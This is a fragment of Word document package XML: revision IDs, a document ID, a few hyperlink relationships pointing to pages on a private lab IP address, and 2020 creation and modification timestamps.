    <w:rsid w:val="00E30FEE"/>
    <w:rsid w:val="00E64E85"/>
    <w:rsid w:val="00E73E16"/>
    <w:rsid w:val="00EC446C"/>
    <w:rsid w:val="00EE0AC9"/>
    <w:rsid w:val="00EE148C"/>
    <w:rsid w:val="00F8281F"/>
    <w:rsid w:val="00F94B24"/>
    <w:rsid w:val="00F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5E6F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B91BE4FA-E1B1-4FEB-9B84-80DEAAB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3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C2B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://10.10.10.150/administrator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10.10.10.150/index.php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mailto:floris@10.10.10.150:/tmp" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.10.150/secret.tx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41</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-10-03T08:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-10-05T19:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>